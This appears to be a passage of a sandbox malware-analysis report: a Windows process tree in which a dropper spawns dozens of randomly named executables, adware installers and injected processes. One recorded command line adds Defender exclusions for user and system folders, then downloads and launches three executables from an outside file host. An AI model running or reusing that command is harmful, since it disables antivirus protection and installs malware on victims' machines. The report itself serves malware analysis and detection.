                                                                                                                                                    • C:\Users\Admin\Documents\posuivhNlqACsYj33uam4392.exe
                                                                                                                                                      "C:\Users\Admin\Documents\posuivhNlqACsYj33uam4392.exe"
                                                                                                                                                      6⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:6580
                                                                                                                                                    • C:\Users\Admin\Documents\mL2rYXpFioAg4soYQ2n6oACG.exe
                                                                                                                                                      "C:\Users\Admin\Documents\mL2rYXpFioAg4soYQ2n6oACG.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:6704
                                                                                                                                                        • C:\Users\Admin\Documents\mL2rYXpFioAg4soYQ2n6oACG.exe
                                                                                                                                                          "C:\Users\Admin\Documents\mL2rYXpFioAg4soYQ2n6oACG.exe" -q
                                                                                                                                                          7⤵
                                                                                                                                                            PID:3172
                                                                                                                                                        • C:\Users\Admin\Documents\TnOcf5OnkVVhpYnNqmn0V3lh.exe
                                                                                                                                                          "C:\Users\Admin\Documents\TnOcf5OnkVVhpYnNqmn0V3lh.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:6864
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                                                                                                                                              7⤵
                                                                                                                                                                PID:7252
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:7808
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:8884
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:8196
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:4852
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:8784
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:5904
                                                                                                                                                                        • C:\Users\Admin\Documents\jLj1KRl7Wh0of1ptA3Lmr_bZ.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\jLj1KRl7Wh0of1ptA3Lmr_bZ.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:7084
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5633132.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5633132.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                              PID:7928
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1340993.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1340993.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:5848
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\7237236.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\7237236.exe"
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:5620
                                                                                                                                                                              • C:\Users\Admin\Documents\A23Ayg6MlA2S8O5cSFSG5DpC.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\A23Ayg6MlA2S8O5cSFSG5DpC.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:6696
                                                                                                                                                                                • C:\Users\Admin\Documents\UnU6yT9v3AZwMhOVFF3HThwm.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\UnU6yT9v3AZwMhOVFF3HThwm.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:6688
                                                                                                                                                                                    • C:\Users\Admin\Documents\UnU6yT9v3AZwMhOVFF3HThwm.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\UnU6yT9v3AZwMhOVFF3HThwm.exe"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:9108
                                                                                                                                                                                    • C:\Users\Admin\Documents\DCbWUAjMYMWG4bi7Ib3ufG5p.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\DCbWUAjMYMWG4bi7Ib3ufG5p.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:6356
                                                                                                                                                                                      • C:\Users\Admin\Documents\nLzXGkEyBusWmHhEh3MQ9MC_.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\nLzXGkEyBusWmHhEh3MQ9MC_.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        PID:6588
                                                                                                                                                                                      • C:\Users\Admin\Documents\MM6bxhR1XdM4iXPiXXnslTZn.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\MM6bxhR1XdM4iXPiXXnslTZn.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:5960
                                                                                                                                                                                          • C:\Users\Admin\Documents\MM6bxhR1XdM4iXPiXXnslTZn.exe
                                                                                                                                                                                            C:\Users\Admin\Documents\MM6bxhR1XdM4iXPiXXnslTZn.exe
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:7684
                                                                                                                                                                                          • C:\Users\Admin\Documents\N6jMMNuA0WyDfbEjCqUv0k7G.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\N6jMMNuA0WyDfbEjCqUv0k7G.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:6000
                                                                                                                                                                                            • C:\Users\Admin\Documents\N6jMMNuA0WyDfbEjCqUv0k7G.exe
                                                                                                                                                                                              C:\Users\Admin\Documents\N6jMMNuA0WyDfbEjCqUv0k7G.exe
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:7612
                                                                                                                                                                                            • C:\Users\Admin\Documents\T7Gx01c83YMY5bTYIGPv4diD.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\T7Gx01c83YMY5bTYIGPv4diD.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                              PID:6680
                                                                                                                                                                                            • C:\Users\Admin\Documents\bz4ABxUMfc3Ls3uvejVLQEMi.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\bz4ABxUMfc3Ls3uvejVLQEMi.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:6672
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 680
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                  PID:4576
                                                                                                                                                                                              • C:\Users\Admin\Documents\iiYu9sB90vd6TuzzKmNAJLqd.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\iiYu9sB90vd6TuzzKmNAJLqd.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                PID:6656
                                                                                                                                                                                                • C:\Users\Admin\Documents\iiYu9sB90vd6TuzzKmNAJLqd.exe
                                                                                                                                                                                                  C:\Users\Admin\Documents\iiYu9sB90vd6TuzzKmNAJLqd.exe
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                    PID:7140
                                                                                                                                                                                                • C:\Users\Admin\Documents\lFBObrH6EHMpheoAYeJGm8Xi.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\lFBObrH6EHMpheoAYeJGm8Xi.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  PID:6648
                                                                                                                                                                                                • C:\Users\Admin\Documents\CBI5BczzSjtjXFJiTUqNQM5w.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\CBI5BczzSjtjXFJiTUqNQM5w.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  PID:6640
                                                                                                                                                                                                • C:\Users\Admin\Documents\YaAMUeDiAq6Xh8JKn8FPm07d.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\YaAMUeDiAq6Xh8JKn8FPm07d.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:6632
                                                                                                                                                                                                  • C:\Users\Admin\Documents\i5y6yr2MI6AcxzlCAW5Vu6mc.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\i5y6yr2MI6AcxzlCAW5Vu6mc.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:6624
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 660
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:7880
                                                                                                                                                                                                    • C:\Users\Admin\Documents\HrVJwX4JK_BrfAM01ZGJkPgU.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\HrVJwX4JK_BrfAM01ZGJkPgU.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                      PID:6612
                                                                                                                                                                                                    • C:\Users\Admin\Documents\cxnmgIGgZFGjgX5yjI_f3JeN.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\cxnmgIGgZFGjgX5yjI_f3JeN.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      PID:6228
                                                                                                                                                                                                      • C:\Users\Admin\Documents\cxnmgIGgZFGjgX5yjI_f3JeN.exe
                                                                                                                                                                                                        C:\Users\Admin\Documents\cxnmgIGgZFGjgX5yjI_f3JeN.exe
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:7784
                                                                                                                                                                                                        • C:\Users\Admin\Documents\cxnmgIGgZFGjgX5yjI_f3JeN.exe
                                                                                                                                                                                                          C:\Users\Admin\Documents\cxnmgIGgZFGjgX5yjI_f3JeN.exe
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:8084
                                                                                                                                                                                                          • C:\Users\Admin\Documents\cxnmgIGgZFGjgX5yjI_f3JeN.exe
                                                                                                                                                                                                            C:\Users\Admin\Documents\cxnmgIGgZFGjgX5yjI_f3JeN.exe
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:7280
                                                                                                                                                                                                            • C:\Users\Admin\Documents\cxnmgIGgZFGjgX5yjI_f3JeN.exe
                                                                                                                                                                                                              C:\Users\Admin\Documents\cxnmgIGgZFGjgX5yjI_f3JeN.exe
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:7388
                                                                                                                                                                                                            • C:\Users\Admin\Documents\owjN8oM_IR5b6pDPbdHuHoD6.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\owjN8oM_IR5b6pDPbdHuHoD6.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                              PID:6604
                                                                                                                                                                                                            • C:\Users\Admin\Documents\_HxZx4Vizrz5HGFreaj2jTFb.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\_HxZx4Vizrz5HGFreaj2jTFb.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:6592
                                                                                                                                                                                                              • C:\Users\Admin\Documents\XcIoTauhzRXv_neuMWaGOxTR.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\XcIoTauhzRXv_neuMWaGOxTR.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:8036
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-48D9C.tmp\XcIoTauhzRXv_neuMWaGOxTR.tmp
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-48D9C.tmp\XcIoTauhzRXv_neuMWaGOxTR.tmp" /SL5="$90048,138429,56832,C:\Users\Admin\Documents\XcIoTauhzRXv_neuMWaGOxTR.exe"
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                    PID:5128
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-JKELC.tmp\Setup.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-JKELC.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:8944
                                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                          PID:4920
                                                                                                                                                                                                          • C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                            PID:1180
                                                                                                                                                                                                            • C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe
                                                                                                                                                                                                              C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5000
                                                                                                                                                                                                              • C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe
                                                                                                                                                                                                                C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                PID:208
                                                                                                                                                                                                              • C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe
                                                                                                                                                                                                                C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:4344
                                                                                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:4108
                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:1828
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                PID:4736
                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                              PID:9084
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                PID:9116
                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                              PID:764
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                PID:9184
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-Q4PVH.tmp\WEATHER Manager.tmp
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-Q4PVH.tmp\WEATHER Manager.tmp" /SL5="$10300,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                            PID:5144
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-DQ7L0.tmp\Setup.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-DQ7L0.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:6452
                                                                                                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-DQ7L0.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-DQ7L0.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289445 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:2268
                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                PID:5960
                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 0CBEFA55EA7E5A83B9D30E50FBE3F373 C
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  PID:7188
                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 1160C4407C6E368D63E30D184C8F218E C
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  PID:7956
                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 39F4A82BD1581E04557FB6C6B401E02F
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  PID:2768
                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding D7BA97D8BC9B706B6B72CF42DBDA04BF C
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  PID:8568
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                  PID:5712
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                    PID:8396
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                      PID:6248
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1fc,0x200,0x204,0x1d8,0x208,0x7fff9243dec0,0x7fff9243ded0,0x7fff9243dee0
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:5076
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff700df9e70,0x7ff700df9e80,0x7ff700df9e90
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:8332
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1800,3658205023189979917,4237665452478562674,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6248_1490804399" --mojo-platform-channel-handle=1924 /prefetch:8
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:5100
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1800,3658205023189979917,4237665452478562674,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6248_1490804399" --mojo-platform-channel-handle=1896 /prefetch:8
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:2628
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1800,3658205023189979917,4237665452478562674,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6248_1490804399" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2596 /prefetch:1
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                PID:764
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1800,3658205023189979917,4237665452478562674,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6248_1490804399" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1844 /prefetch:2
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:8848
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1800,3658205023189979917,4237665452478562674,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6248_1490804399" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2616 /prefetch:1
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                  PID:5796
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
